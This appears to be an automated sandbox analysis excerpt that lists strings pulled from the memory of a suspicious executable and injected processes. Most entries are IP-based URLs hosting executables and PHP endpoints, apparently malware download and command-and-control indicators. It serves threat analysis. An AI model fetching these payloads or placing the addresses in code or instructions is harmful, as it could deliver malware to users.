                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.c equals www.youtube.com (Youtube)
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.000000000062B000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457084497.00000000043CA000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1419328721.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1453551457.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457040379.00000000043C7000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1450196885.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429282984.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.000000000062B000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.00000000043C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.149:54674/vape/niko.exe
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.000000000062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.149:54674/vape/niko.exe7c
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.00000000043C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.149:54674/vape/niko.exe8
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.149:54674/vape/niko.exe:t
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.000000000062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.149:54674/vape/niko.exe;
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.149:54674/vape/niko.exeP
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.149:54674/vape/niko.exeU
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.000000000062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.149:54674/vape/niko.exeings
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.000000000062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.149:54674/vape/niko.exeom/D
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.47.149:54674/vape/niko.exez
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1451806500.0000000004369000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.000000000437A000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1418845249.000000000437A000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1456849996.000000000436F000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.000000000436C000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.000000000437A000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.0000000004369000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429328334.000000000437A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.111.174.109/pelikan
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.111.174.109/pelikanK
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.000000000062B000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002AB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.159/dl.php
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002A76000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002A76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.159/dl.phpV
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.159/dl.php_
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.159/dl.phpaw
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.159/dl.phpx
                  Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.82
                  Source: AddInProcess32.exe, 00000005.00000002.2604784378.00000000029A3000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002994000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.00000000029C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.82/server/15/AppGate2103v15.exe
                  Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002D19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.82/server/15/AppGate2103v15.exe$n
                  Source: AddInProcess32.exe, 00000005.00000002.2604784378.00000000029C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.82/server/15/AppGate2103v15.exe)
                  Source: AddInProcess32.exe, 00000005.00000002.2604784378.00000000029A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.82/server/15/AppGate2103v15.exet-
                  Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.172.18
                  Source: explorer.exe, 00000024.00000003.2275944266.0000000011531000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://45.129.96.86:80/file/update.exe
                  Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.0b
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1451806500.0000000004369000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.000000000437A000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1418845249.000000000437A000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1456849996.000000000436F000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.000000000436C000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1461461741.0000000002A65000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.000000000437A000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.0000000004369000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429328334.000000000437A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/123p.exe
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/123p.exeitdq
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.000000000062B000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002A76000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002A76000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1461461741.0000000002A65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/getimage15.php
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.000000000062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/getimage15.phpP=ce
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/getimage15.phps/Iy
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457084497.00000000043CA000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1453551457.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457040379.00000000043C7000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1450196885.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.00000000043C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/retail.php
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/retail.phphp
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/retail.phppuLp$
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1450196885.00000000043C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/retail.phpt_
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1450196885.00000000043C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/space.php
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/space.phpLt
                  Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A43000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.47
                  Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.00000000029A3000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.000000000299F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CA4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002994000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.00000000029C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.47/files/setup.exe
                  Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.00000000029C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.47/files/setup.exe$n
                  Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.47/files/setup.exe-
                  Source: explorer.exe, 00000024.00000003.2272271492.000000000C721000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000024.00000003.2273666539.000000000C721000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://66.85.156.89/
                  Source: explorer.exe, 00000024.00000003.2274886425.000000000C1E9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://66.85.156.89/nafdhkdf.exe
                  Source: explorer.exe, 00000024.00000003.2274608551.000000000C42C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://66.85.156.89:80/nafdhkdf.exec#
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1315897235.0000000000597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.192.56.26/
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1315587677.00000000005BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.192.56.26/api/bing_release.php
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.192.56.26/api/flash.php
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.192.56.26/api/flash.phpb
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1315897235.0000000000597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.192.56.26:80/api/bing_release.php
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.000000000062B000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.000000000062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.232/o2i3jroi23joj23ikrjokij3oroi.exe
                  Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.232/o2i3jroi23joj23ikrjokij3oroi.exeyy
                  Source: svchost.exe, 00000034.00000003.1879020680.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.2019585749.000001F4D993C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS
                  Source: svchost.exe, 00000034.00000002.2853548341.000001F4D96A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS%3C/ds:KeyName%3E%3C/ds:KeyInfo%3E%3CCipherData%3E%3CCipherValue%3EM.C552_BAY
                  Source: svchost.exe, 00000034.00000003.1408056541.000001F4D8702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS&lt;/ds:KeyName&gt;&lt;/ds:Key
                  Source: svchost.exe, 00000034.00000002.2798278482.000001F4D8702000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1553593331.000001F4D8702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS&lt;/ds:KeyName&gt;&ltX
                  Source: svchost.exe, 00000034.00000003.2366828259.000001F4D9937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/PPCRLwssecurity-utility-1.0.xsd
                  Source: svchost.exe, 00000034.00000003.1960391374.000001F4D8679000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
                  Source: svchost.exe, 00000034.00000003.1503483215.000001F4D8F78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tbA
                  Source: svchost.exe, 00000034.00000002.2848663976.000001F4D963D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_
                  Source: svchost.exe, 00000034.00000002.2848663976.000001F4D963D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_com
                  Source: AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002D1B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a-dira.net
